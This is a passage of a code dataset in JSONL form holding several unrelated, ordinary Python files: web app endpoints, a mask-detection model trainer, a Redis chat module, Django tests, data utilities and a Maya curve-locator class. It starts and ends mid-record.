\"\n\n\nif __name__ == '__main__':\n port = int(os.getenv('PORT', 5000))\n\n print(\"Starting app on port %d\" % port)\n\n app.run(debug=False, port=port, host='0.0.0.0')\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"565281966","text":"#Import library for model training \nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications.mobilenet_v2 import MobileNetV2\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten, GlobalAveragePooling2D\nfrom tensorflow.keras.optimizers import Adam\nprint(tf.__version__)\ntf.test.gpu_device_name()\n\n#Data images processing\nimg_generator = ImageDataGenerator(rescale = 1 / 255.0,\n zoom_range = 0.1,\n width_shift_range = 0.1,\n height_shift_range = 0.1,\n shear_range = 0.2,\n horizontal_flip = True,\n fill_mode = 'nearest')\n\ntrain = img_generator.flow_from_directory('/Users/faimonsterz/Development/Project-MaskDetection/dataset', \n target_size = (224, 224),\n classes = ['with_mask','without_mask'],\n class_mode = 'categorical', \n batch_size = 64, \n shuffle = True)\n\n#Model design\nbased_model = MobileNetV2(weights = 'imagenet',\n include_top = False,\n input_shape = (224, 224, 3))\nbased_model.trainable = False\n\nmodel = Sequential()\nmodel.add(based_model)\nmodel.add(GlobalAveragePooling2D())\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(2))\nmodel.add(Activation('softmax'))\nmodel.summary()\n\n#Model optimizer\nopt = Adam(lr = 0.001, decay = 0.001 / 20)\nmodel.compile(loss = 'binary_crossentropy', optimizer = opt, metrics = ['accuracy']) \n\n#Model traning\nmodel.fit(train, batch_size = 64, epochs = 
10)\n\n\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"217492236","text":"from fastapi import FastAPI, Depends\nfrom sqlalchemy.orm import Session\nfrom starlette.responses import Response\nfrom dao import ProductDAO, CategoryDAO\nfrom database import Base, engine, SessionLocal\nfrom schemas import *\napp = FastAPI()\n\nBase.metadata.create_all(bind=engine)\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello Olist !!!\"}\n\n# CRUD PRODUTOS\n@app.post(\"/product/\")\nasync def create_product(product: ProductCreate, db: Session = Depends(get_db)):\n return ProductDAO().create(db=db, product=product)\n \n@app.get(\"/products/\")\nasync def get_products(db: Session = Depends(get_db)):\n return ProductDAO().read(db=db)\n\n@app.get(\"/product/\")\nasync def get_product_by(\n db: Session = Depends(get_db), \n name: str = \"\", \n description: str = \"\",\n value: float = 0,\n categories_id: int = 0\n):\n filters = {}\n if name: \n filters[\"name\"] = name\n if description: \n filters[\"description\"] = description\n if value:\n filters[\"value\"] = value\n if categories_id:\n filters[\"categories_id\"] = categories_id\n\n return ProductDAO().read_by(db=db, filters=filters)\n\n@app.put(\"/product/{product_id}\")\nasync def update_product(product_id: int, product: ProductUpdate, db: Session = Depends(get_db)):\n return ProductDAO().update(db=db, product=product, id=product_id)\n\n@app.delete(\"/product/{product_id}\")\nasync def delete_product(product_id : int, db: Session = Depends(get_db)):\n return ProductDAO().delete(db=db, id=product_id)\n\n@app.get(\"/category/file\")\nasync def create_category_from_file(db: Session = Depends(get_db)):\n file = \"../categorias.csv\"\n return CategoryDAO().create_from_csv(db=db, 
file=file)\n\n@app.get(\"/categories/\")\nasync def get_product_by(db: Session = Depends(get_db)):\n return CategoryDAO().read(db=db)\n \n\n\n","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"230042207","text":"import redis\nimport time\nimport json\nfrom Unit6 import DistributedLock\n\npool = redis.ConnectionPool(host='localhost', port=6379, decode_responses=True)\nconn = redis.Redis(connection_pool=pool)\n\n\ndef create_chat(sender, recipients, message, chat_id=None):\n \"\"\" 创建群组\n @param string sender: 发送者\n @param map|list recipients: 接收者\n @param string message: 消息\n @param int chat_id: 群号\n @return:\n \"\"\"\n\n chat_id = chat_id or str(conn.incr('ids:chat:'))\n recipients.append(sender)\n recipientsd = dict((r, 0) for r in recipients)\n pipe = conn.pipeline()\n pipe.zadd('chat:' + chat_id, recipientsd)\n for r in recipients:\n pipe.zadd('seen:' + r, {chat_id: 0})\n pipe.execute()\n chat_id = send_message(sender, message, chat_id)\n fetch_pending_message(sender)\n return chat_id\n\n\ndef send_message(sender, message, chat_id):\n \"\"\" 发送消息\n @param string sender: 发送者\n @param string message: 消息\n @param int chat_id: 群号\n @return:\n \"\"\"\n\n identifier = DistributedLock.acquire_lock('chat:' + str(chat_id))\n if not identifier:\n raise Exception('Could not get the lock')\n try:\n message_id = conn.incr('mid:' + str(chat_id))\n message_info = {\n 'id': message_id,\n 'message': message,\n 'sender': sender,\n 'time': time.time()\n }\n conn.zadd('msg:' + str(chat_id), {json.dumps(message_info): message_id})\n finally:\n DistributedLock.release_lock('chat:' + str(chat_id), identifier)\n return chat_id\n\n\ndef fetch_pending_message(recipient):\n \"\"\" 读取消息\n\n @param string recipient: 接收人\n @return:\n \"\"\"\n\n seen = conn.zrange('seen:' + recipient, 0, -1, withscores=True)\n pipe = conn.pipeline(True)\n for chat_id, 
seen_id in seen:\n pipe.zrangebyscore('msg:' + chat_id, seen_id + 1, 'inf')\n # 获取要读取消息人各个群组的所有未读消息\n chat_info = zip(seen, pipe.execute())\n result = []\n for i, ((chat_id, seen_id), messages) in enumerate(chat_info):\n if not messages:\n continue\n messages[:] = map(json.loads, messages)\n mid = messages[-1]['id']\n # 更新已读消息条数\n pipe.zadd('chat:' + chat_id, {recipient: mid})\n pipe.zadd('seen:' + recipient, {chat_id: mid})\n # 获取该群组所有人最少的未读消息,将所有人都读过的消息进行异常\n pipe.zrange('chat:' + chat_id, 0, 0, withscores=True)\n min_seen = int(pipe.execute()[-1][0][1])\n pipe.zremrangebyscore('msg:' + chat_id, 0, min_seen)\n result.append((chat_id, messages))\n pipe.execute()\n return result\n\n\ndef join_chat(chat_id, user_id):\n \"\"\" 加入群组\n\n @param int chat_id: 群组id\n @param string user_id: 用户\n @return:\n \"\"\"\n\n mid = int(conn.get('mid:' + chat_id))\n pipe = conn.pipeline(True)\n pipe.zadd('chat:' + str(chat_id), {user_id: mid})\n pipe.zadd('seen:' + user_id, {chat_id: mid})\n pipe.execute()\n\n\ndef leave_chat(chat_id, user_id):\n \"\"\" 移出群聊\n\n @param int chat_id: 群组id\n @param string user_id: 用户\n @return:\n \"\"\"\n pipe = conn.pipeline(True)\n pipe.zrem('chat:' + str(chat_id), user_id)\n pipe.zrem('seen:' + user_id, str(chat_id))\n pipe.zcard('chat:' + str(chat_id))\n if not pipe.execute()[-1]:\n conn.delete('msg:' + str(chat_id), 'mid:' + str(chat_id))\n else:\n oldest = conn.zrange('chat:' + str(chat_id), 0, 0, withscores=True)\n conn.zremrangebyscore('msg:' + str(chat_id), 0, oldest[0][1])\n\n\nif __name__ == '__main__':\n # create_chat('zhangshuai', ['sun1', 'sun2', 'sun4'], '小老婆们')\n # send_message('sunsun2', '老公我爱你,么么哒', 1)\n print(fetch_pending_message('sun1'))\n # fetch_pending_message('sun4')\n # fetch_pending_message('sun2')\n # fetch_pending_message('zhangshuai')\n # join_chat('1', 'dasunsun2')\n # leave_chat('1', 
'dasunsun1')\n","sub_path":"Unit6/Chat.py","file_name":"Chat.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"519783370","text":"import json\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom base_app import http_statuses as http\nfrom . import messages as mess\n\nUser = get_user_model()\nUsers = User.objects\n\nCORRECT_TEST_CHANNEL_ID = 'UCq-d_I6u6kMF2PssEcHHEkA'\nCORRECT_TEST_CHANNEL_LINK = 'https://www.youtube.com/channel/UCq-d_I6u6kMF2PssEcHHEkA'\n\nFORBIDDEN_TEST_CHANNEL_ID = 'UCFcqTyFdQcB4QbjM0FrZivw'\nFORBIDDEN_TEST_CHANNEL_LINK = 'https://www.youtube.com/channel/UCFcqTyFdQcB4QbjM0FrZivw'\n\n\nclass YoutubeSubscriptionsTests(TestCase):\n \"\"\"\n This TestCase tests youtube_subscriptions view.\n \"\"\"\n\n def setUp(self):\n self.request = {\n 'path': reverse('youtube subscriptions'),\n 'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest',\n }\n self.email = 'a@a.ru'\n self.password = 'asdfgh'\n self.user = Users.create(email=self.email, raw_password=self.password)\n self.client.login(email=self.email, password=self.password)\n\n def test_account_not_connected(self):\n self.user.youtube_disconnect()\n self.user.save()\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.YOUTUBE_NOT_CONNECTED)\n self.assertEqual(resp_json['status'], http.FORBIDDEN)\n\n def test_account_not_exists(self):\n self.user.youtube_connect('неверный айди')\n self.user.save()\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.CHANNEL_NOT_FOUND)\n self.assertEqual(resp_json['status'], http.NOT_FOUND)\n\n def test_forbidden_subs(self):\n self.user.youtube_connect(FORBIDDEN_TEST_CHANNEL_ID)\n 
self.user.save()\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.YOUTUBE_SUBS_FORBIDDEN)\n self.assertEqual(resp_json['status'], http.FORBIDDEN)\n\n def test_correct(self):\n self.user.youtube_connect(CORRECT_TEST_CHANNEL_ID)\n self.user.save()\n resp = self.client.post(**self.request)\n self.assertTemplateUsed(resp,\n 'subscriptions/youtube_subscriptions.html')\n\n\nclass ToggleSubscriptionTests(TestCase):\n \"\"\"\n This TestsCase tests toggle_subscription view.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n This function initializes two iterating users,\n and set ajax header to request args.\n \"\"\"\n # ajax request\n self.request = {\n 'path': reverse('toggle subscription'),\n 'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest',\n }\n password = 'asdfgh'\n email = 'a@a.ru'\n self.user_from = Users.create(email=email, raw_password=password)\n self.client.login(email=email, password=password)\n self.user_to = Users.create(email='b@b.ru')\n\n def test_empty_request(self):\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.FIELD_REQUIRED)\n self.assertEqual(resp_json['status'], http.BAD_REQUEST)\n\n def test_not_int(self):\n self.request['data'] = {'user_to': 'not int'}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.USER_ID_NOT_EXISTS)\n self.assertEqual(resp_json['status'], http.BAD_REQUEST)\n\n def test_not_exists(self):\n self.request['data'] = {'user_to': self.user_to.id + 1}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.USER_ID_NOT_EXISTS)\n self.assertEqual(resp_json['status'], http.BAD_REQUEST)\n\n def test_activate(self):\n 
self.request['data'] = {'user_to': self.user_to.id}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertNotIn('message', data)\n self.assertTrue(data['is_subscribed'])\n self.assertEqual(data['subscribe_text'], mess.UNSUBSCRIBE)\n self.assertEqual(resp_json['status'], http.OK)\n\n def test_deactivate(self):\n self.user_from.outbound_subs.create(user_to=self.user_to)\n self.request['data'] = {'user_to': self.user_to.id}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertNotIn('message', data)\n self.assertFalse(data['is_subscribed'])\n self.assertEqual(data['subscribe_text'], mess.SUBSCRIBE)\n self.assertEqual(resp_json['status'], http.OK)\n\n\nclass CheckNewYoutubeSubsTests(TestCase):\n def setUp(self):\n self.user = Users.create()\n self.subs1 = ['1', '2', '3']\n self.subs2 = ['4', '3', '1']\n self.subs3 = ['3', '1', '2']\n\n def test_not_viewed_not_new(self):\n self.user.viewed_youtube_subs = []\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs([])\n self.assertFalse(self.user.has_new_youtube_subs)\n\n def test_not_viewed_has_new(self):\n self.user.viewed_youtube_subs = []\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs(self.subs1)\n self.assertTrue(self.user.has_new_youtube_subs)\n\n def test_has_viewed_not_new(self):\n self.user.viewed_youtube_subs = self.subs1\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs([])\n self.assertFalse(self.user.has_new_youtube_subs)\n\n def test_has_viewed_has_new(self):\n self.user.viewed_youtube_subs = self.subs1\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs(self.subs2)\n self.assertTrue(self.user.has_new_youtube_subs)\n\n def test_shuffle(self):\n self.user.viewed_youtube_subs = self.subs1\n 
self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs(self.subs3)\n self.assertFalse(self.user.has_new_youtube_subs)\n","sub_path":"subscriptions/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90687654","text":"# -*- coding: utf-8 -*-\r\n\r\n#练习题4-穿墙而过\r\n\r\n\r\nBrick=eval(input('输入:'))\r\n#print(len(Brick))\r\nBrick_add=Brick\r\nTem_sum=0\r\nfor Brick_item in Brick_add:\r\n Sum_item=0\r\n for i in range(len(Brick_item)):\r\n Sum_item+=Brick_item[i]\r\n Brick_item[i]=Sum_item\r\n Tem_sum=Sum_item\r\n\r\nBrick_list=[]\r\nfor Brick_item in Brick_add:\r\n for i in Brick_item:\r\n if i!=Tem_sum:\r\n Brick_list.append(i)\r\n\r\n\r\nMinus=max(Brick_list.count(x) for x in set(Brick_list))\r\nprint(Tem_sum-Minus)\r\n","sub_path":"上机练习/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"51654643","text":"import sys\nfrom video import Video\nfrom visualobjects import VisualObject\nimport util\nimport os\nimport processframe\n\nif __name__ == \"__main__\":\n videopath = sys.argv[1]\n objdir = sys.argv[2]\n outdir = sys.argv[3]\n outfile = outdir + \"/visualobj.json\"\n if not os.path.exists(os.path.abspath(outdir)):\n os.makedirs(os.path.abspath(outdir))\n outfile = open(outfile, \"w\")\n \n video = Video(videopath)\n list_of_objs = VisualObject.objs_from_file(video, objdir)\n \n outfile.write(\"{\\n \\\"data\\\":[\\n\")\n count = 0\n nobjs = len(list_of_objs)\n for obj in list_of_objs:\n count += 1\n mask = processframe.fgmask(obj.img, threshold=200)\n aimg = processframe.alphaimage(obj.img, mask)\n# util.showimages([aimg])\n util.saveimage(aimg, outdir, obj.imgpath)\n h, w = obj.img.shape[0:2]\n startt = video.fid2sec(obj.start_fid)\n outfile.write(\"\\\n {\\n \\\n \\\"filename\\\": 
\\\"%s\\\",\\n \\\n \\\"x\\\": %i,\\n \\\n \\\"y\\\": %i,\\n \\\n \\\"h\\\": %i,\\n \\\n \\\"w\\\": %i,\\n \\\n \\\"time\\\": %i\\n \\\n }\" %(obj.imgpath, obj.tlx, obj.tly, h, w, startt))\n if count != nobjs:\n outfile.write(\",\\n\")\n \n outfile.write(\"\\n]\\n}\")\n outfile.close()\n","sub_path":"Scripts/notevideo_objs.py","file_name":"notevideo_objs.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"195042207","text":"# This file is part of the Etsin service\n#\n# Copyright 2017-2018 Ministry of Education and Culture, Finland\n#\n# :author: CSC - IT Center for Science Ltd., Espoo Finland \n# :license: MIT\n\n\"\"\"Various utils and constants\"\"\"\n\nimport json\nimport os\nfrom datetime import datetime\nimport pytz\nfrom dateutil import parser\n\n\nACCESS_TYPES = {\n 'open': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/open',\n 'login': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/login',\n 'permit': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/permit',\n 'embargo': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/embargo',\n 'restricted': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/restricted'\n}\n\nSAML_ATTRIBUTES = {\n 'first_name': 'urn:oid:2.5.4.42',\n 'last_name': 'urn:oid:2.5.4.4',\n 'email': 'urn:oid:0.9.2342.19200300.100.1.3',\n 'haka_id': 'urn:oid:1.3.6.1.4.1.5923.1.1.1.6',\n 'haka_org_id': 'urn:oid:1.3.6.1.4.1.25178.1.2.9',\n 'haka_org_name': 'urn:oid:1.3.6.1.4.1.16161.4.0.88',\n 'CSC_username': 'urn:oid:1.3.6.1.4.1.16161.4.0.53',\n 'idm_groups': 'urn:oid:1.3.6.1.4.1.8057.2.80.26'\n}\n\nDATA_CATALOG_IDENTIFIERS = {\n 'ida': 'urn:nbn:fi:att:data-catalog-ida',\n 'att': 'urn:nbn:fi:att:data-catalog-att'\n}\n\ndef get_log_config(log_file_path, log_lvl):\n \"\"\"\n Function to get the logging configuration from utils.py\n\n Arguments:\n log_file_path {string} -- The log file path.\n log_lvl {string} -- 
The logging level\n\n Returns:\n [dict] -- Dict containgin the logging configuration.\n\n \"\"\"\n if (log_file_path and log_lvl):\n CONFIG = {\n 'version': 1,\n 'formatters': {\n 'standard': {\n 'format': '--------------\\n[%(asctime)s] [%(process)d] %(levelname)s in %(filename)s:%(lineno)d: %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S %z',\n }\n },\n 'handlers': {\n 'file': {\n 'class': 'logging.handlers.RotatingFileHandler',\n 'formatter': 'standard',\n 'filename': log_file_path,\n 'maxBytes': 10000000,\n 'mode': 'a',\n 'backupCount': 30\n },\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n 'stream': 'ext://sys.stdout'\n }\n },\n 'root': {\n 'level': log_lvl,\n 'handlers': ['file', 'console']\n }\n }\n return CONFIG\n return False\n\n\ndef executing_travis():\n \"\"\"Returns True whenever code is being executed by travis\"\"\"\n return True if os.getenv('TRAVIS', False) else False\n\n\ndef write_json_to_file(json_data, filename):\n \"\"\"\n Write JSON data to file.\n\n :param json_data:\n :param filename:\n \"\"\"\n with open(filename, \"w\") as output_file:\n json.dump(json_data, output_file)\n\n\ndef json_or_empty(response):\n \"\"\"\n Return response JSON as python dict or empty dict.\n\n :param response:\n :return:\n \"\"\"\n response_json = {}\n try:\n response_json = response.json()\n except Exception:\n pass\n return response_json\n\n\ndef remove_keys_recursively(obj, fields_to_remove):\n \"\"\"\n Remove specified keys recursively from a python object (dict or list)\n\n :param obj:\n :param fields_to_remove:\n :return:\n \"\"\"\n if isinstance(obj, dict):\n obj = {\n key: remove_keys_recursively(value, fields_to_remove) for key, value in obj.items()\n if key not in fields_to_remove\n }\n elif isinstance(obj, list):\n obj = [remove_keys_recursively(item, fields_to_remove) for item in obj if item not in fields_to_remove]\n\n return obj\n\n\ndef leave_keys_in_dict(dict_obj, fields_to_leave):\n \"\"\"\n Removes the key-values 
from dict_obj, for which key is NOT listed in fields_to_leave.\n\n NOTE: Is not recursive\n\n :param dict_obj:\n :param fields_to_leave:\n :return:\n \"\"\"\n for key in list(dict_obj):\n if key not in fields_to_leave:\n del dict_obj[key]\n\n\ndef _parse_timestamp_string_to_tz_aware_datetime(timestamp_str):\n if not isinstance(timestamp_str, str):\n raise ValueError(\"Timestamp must be a string\")\n\n try:\n dt = parser.parse(timestamp_str)\n if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:\n dt = pytz.timezone('Europe/Helsinki').localize(dt)\n return dt\n except Exception:\n raise ValueError(\"Unable to parse timestamp: {0}\".format(timestamp_str))\n\n\ndef tz_now_is_later_than_timestamp_str(timestamp_str):\n \"\"\"\n Is timestamp_str later in time than current time.\n\n :param timestamp_str:\n :return:\n \"\"\"\n datetime_obj = _parse_timestamp_string_to_tz_aware_datetime(timestamp_str)\n return datetime.now(tz=pytz.timezone('Europe/Helsinki')) >= datetime_obj\n\ndef datetime_to_header(datetime_str):\n \"\"\"\n Modifie ISO 8601 datetime format to HTTP datetime (RFC2616).\n\n The function does also work with some other formats and without\n tz, but it is not recommended.\n\n Arguments:\n datetime_str [string] -- Datetime string represented in the ISO 8601 format (ex. 2020-01-23T14:12:44+00:00)\n Returns:\n [string] -- Datetime string in HTTP datetime format (ex. 
Wed, 21 Oct 2015 07:28:00 GMT)\n\n \"\"\"\n try:\n assert isinstance(datetime_str, str), 'datetime_str must be of type string.'\n datetime_obj_local = parser.parse(datetime_str)\n datetime_obj_GMT = datetime_obj_local.astimezone(pytz.utc)\n HTTP_datetime = datetime_obj_GMT.strftime('%a, %d %b %Y %H:%M:%S GMT')\n return HTTP_datetime\n except Exception:\n return False\n\n\ndef sort_array_of_obj_by_key(obj_array, obj_key, obj_nested_key=False):\n \"\"\"\n Sort the objects in an array by using the value of an object key, or if needed, the value of a nested object key contained inside an object pointed to by an object key\n\n :param obj_array: Object array to be sorted\n :obj_key: Object key based on which to sort the object array, or a pointer key to a nested object where the sorting key is located\n :obj_nested_key: Object key based on which to sort the object array, if it is contained below the main level of the sortable object\n \"\"\"\n try:\n if obj_array and obj_key:\n obj_array.sort(key=lambda x: x.get(obj_key, {}).get(obj_nested_key) if obj_nested_key else x.get(obj_key))\n except Exception:\n pass\n\n\ndef slice_array_on_limit(array, limit):\n \"\"\"\n If array contains more items than the limit, return an array containing items up until the limit\n\n :param array:\n :limit: integer\n \"\"\"\n if array and len(array) > limit:\n return array[0:limit]\n return array\n\n\nclass FlaskService:\n \"\"\"Use as base class for external dependency services\"\"\"\n\n def __init__(self, app):\n \"\"\"Init FlaskService\"\"\"\n if app.testing or executing_travis():\n self.is_testing = True\n else:\n self.is_testing = False\n","sub_path":"etsin_finder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"141515934","text":"import argparse\nimport pickle\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport tqdm\n\nfrom src.constraints import 
RoomConstraint\nfrom src.furnishing.furniture_construction import *\nfrom src.furnishing.room_utils import get_example_room\n\nargument_parser = argparse.ArgumentParser()\nargument_parser.add_argument('number_of_samples', type=int, help='Number of samples to generate')\nargument_parser.add_argument('output_path', help='File path to save samples in *.pkl format')\nargument_parser.add_argument('checkpoint', type=int, help='Number of checkpoint break')\nargs = argument_parser.parse_args()\n\n\ndef generate_example_solutions(room, constraint, number_of_samples, output_path, checkpoint_number):\n features = len(room.params_to_optimize)\n features_flatten = len(room.params_to_optimize.flatten())\n boundaries = [(.13, .86), (.13, .86), (-0.5, 0.5)] * features\n boundaries = np.array(boundaries)\n correct_solutions = []\n tasks = []\n with ProcessPoolExecutor(max_workers=8) as p:\n for _ in tqdm.tqdm(range(number_of_samples)):\n tasks.append(p.submit(generate_sample, boundaries, features_flatten, constraint))\n\n i = 0\n for task in tqdm.tqdm(tasks):\n correct_solutions.append(task.result())\n i += 1\n if i % checkpoint_number == 0:\n with open(output_path, 'wb') as f:\n pickle.dump(correct_solutions, f, pickle.HIGHEST_PROTOCOL)\n\n with open(output_path, 'wb') as f:\n pickle.dump(correct_solutions, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef generate_sample(boundaries, features_flatten, constraint):\n sample = np.random.uniform(boundaries[:, 0], boundaries[:, 1], size=(1, features_flatten))\n try:\n while not constraint.check(sample):\n sample = np.random.uniform(boundaries[:, 0], boundaries[:, 1], size=(1, features_flatten))\n except:\n return generate_sample(boundaries, features_flatten, constraint)\n return sample\n\n\ndef main():\n room = get_example_room()\n generate_example_solutions(room, RoomConstraint(room), args.number_of_samples, args.output_path, args.checkpoint)\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"src/furnishing/samples_generator.py","file_name":"samples_generator.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"330883480","text":"# coding=utf-8\r\n'''\r\n커브위에 존재하는 로케이터 생성\r\n'''\r\n__author__ = 'alfred'\r\n\r\nimport pymel.all as pm\r\n\r\nclass LocatorOnCurve(object):\r\n '''\r\n :parameters:\r\n curve , # 커브이름\r\n parameter = 0.5, # 커브 상의 위치\r\n name = None # 이름을 명시할 경우 해당이름으로 그렇지 않으면, locatorShape이 'locator'일땐 'locOnCrv#', 'group'일땐 'grpOnCrv#'\r\n turnOnPercentage = False, # curvePoint를 값으로? 아님. percentage로 할건가? *주의 : percentage로 한다고 해서 커브의 비율로 계한하는게 아님.\r\n rotate = None, # None, aim, orient 중하나\r\n aimVector ='x', # x, y, z, -x, -y, -z, vector 중 하나\r\n upVector ='y', # x, y, z, -x, -y, -z, vector 중 하나\r\n worldAimType = 'tangent', # tangent, normal, vector, object,\r\n worldUpType = 'curverotation', # tangent, normal, scene, vector, object, objectrotation, curverotation\r\n worldAimVector ='x', # worldAimType 이 scene, vector 일때만 유효.\r\n worldUpVector ='y', # worldUpType 이 scene, vector 일때만 유효.\r\n aimObject = None, # worldAimType 이 object, objectrotation 일때만 유효.\r\n worldUpObject = None, # worldUpType 이 object, objectrotation 일때만 유효.\r\n locatorShape ='locator', # locator, group 중 하나\r\n vectorShape ='group', # locator, group 중 하나\r\n\r\n :TODO : worldAimType 에 objectrotation, curverotation 사용 할 수 있도록 방법 찾아야함.\r\n\r\n :sample:\r\n # sample 1:\r\n curve = pm.curve( d=3, p=[ (5.398530435027274, 0.0, 2.636910065983344), (4.344566726592057, 0.0, 3.517847071376655), (2.2366393097216077, 0.0, 5.279721082163249), (-3.343728636037937, 0.0, 2.716482506849595), (-0.22912241191149801, 0.0, -4.813534894925304), (-0.5614162589497707, 0.0, -9.402385791812858), (-3.979692990558796, 0.0, -9.30078556056116), (-5.68883135636331, 0.0, -9.249985444935318) ], k=[ 0.0, 0.0, 0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 5.0, 5.0 ] )\r\n upLoc = pm.spaceLocator()\r\n 
upLoc.ty.set(10)\r\n LocatorOnCurve( curve, parameter=1.0, rotate=None ) # 로테이션 리깅은 안. 제일 빠름.\r\n LocatorOnCurve( curve, parameter=3.0, rotate='orient' ) # 로테이션(Orient)은 커브의 트랜스폼을 사용.\r\n LocatorOnCurve( curve, parameter=2.0, rotate='aim' ) # 로테이션(aim) worldUpType을 명시하지 않을경우, aim은 커브의 tangent crv의 rotation을 up으로 사용\r\n LocatorOnCurve( curve, parameter=0.5, rotate='aim', worldUpType='object', worldUpObject=upLoc )\r\n\r\n :version:\r\n 2014-04-27 : doc 수정\r\n 2014-09-24 : 파라메터 조정, doc 수정\r\n '''\r\n\r\n def __init__(self, *args, **kwargs):\r\n if args:\r\n pm.select(args)\r\n\r\n curves = pm.filterExpand( sm=9, expand=True ) # Nurbs Curves\r\n cps = pm.filterExpand( sm=39, expand=True ) # Curve Parameter Points\r\n eps = pm.filterExpand( sm=30, expand=True ) # Edit Points\r\n cvs = pm.filterExpand( sm=28, expand=True ) # Control Vertices (CVs)\r\n knots = pm.filterExpand( sm=40, expand=True ) # Curve Knot\r\n\r\n #print args\r\n #print curves, cps, eps, cvs, knots\r\n\r\n # Nurbs Curves\r\n if curves:\r\n self.curve = pm.PyNode( curves[0] )\r\n self.param = kwargs.get( 'parameter', kwargs.get( 'p', 0.5))\r\n\r\n # Curve Parameter Points\r\n if cps:\r\n curveStr, paramStr = cps[0].split('.u[')\r\n self.curve = pm.PyNode( curveStr )\r\n self.param = float( paramStr[:-1] )\r\n\r\n # Edit Points\r\n if eps:\r\n # 커브쉐입 이름 가져옴\r\n curve = pm.PyNode( eps[0].split('.ep[')[0] )\r\n epNum = int( eps[0].split('.ep[')[1][:-1] ) # 이름에서 순서만 따옴.\r\n\r\n #\r\n # knotValue들이 parameter값들로 추정됨.\r\n #\r\n # knotValue( parameter )값 가져옴.\r\n # degree가 1일경우엔 : editPoint의순서와 knotValue의 순서가 1:1로 매핑됨.\r\n # 2이상일경우 : editPoint degree-1부터 -(degree-1)\r\n #\r\n degree = curve.degree() # degree\r\n knotValues = curve.getKnots()\r\n if not degree == 1:\r\n knotValues = knotValues[ degree-1 : -(degree-1) ] # degree가 1이면 어레이 조정\r\n param = knotValues[ epNum ]\r\n\r\n self.curve = curve\r\n self.param = param\r\n\r\n #print self.curve, self.param\r\n\r\n self.name = kwargs.get( 'name', kwargs.get( 
